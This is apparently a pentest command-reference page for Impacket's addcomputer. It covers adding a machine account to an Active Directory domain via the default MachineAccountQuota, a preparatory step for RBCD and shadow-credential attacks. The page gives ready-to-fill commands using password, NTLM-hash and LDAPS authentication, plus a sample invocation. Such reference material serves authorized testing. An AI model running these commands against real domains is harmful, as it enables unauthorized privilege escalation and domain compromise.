Impacket addcomputer.py

Add a machine account to the domain using the default MachineAccountQuota (10). Foundation step for RBCD, shadow credentials, and other attacks that need a controlled SPN.

Tool
impacket-addcomputer
Category
Post-Exploitation / AD Object Manipulation
Platform
linux
Requires
password
Protocols
LDAP, SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-addcomputer '<domain>/<user>:<password>' -computer-name '<computer-name>$' -computer-pass '<computer-pass>' -dc-ip <dc-ip>

Credential variants

The same attack using a different authentication material.

Hash Auth requires NTLM hash

impacket-addcomputer '<domain>/<user>' -hashes :<nt-hash> -computer-name '<computer-name>$' -computer-pass '<computer-pass>' -dc-ip <dc-ip>

LDAPS Method requires password

impacket-addcomputer '<domain>/<user>:<password>' -computer-name '<computer-name>$' -computer-pass '<computer-pass>' -dc-ip <dc-ip> -method LDAPS

Examples

impacket-addcomputer 'corp.local/jdoe:Password123!' -computer-name 'FAKE01$' -computer-pass 'Passw0rd!' -dc-ip 10.10.10.10

Tags

impacket addcomputer maq rbcd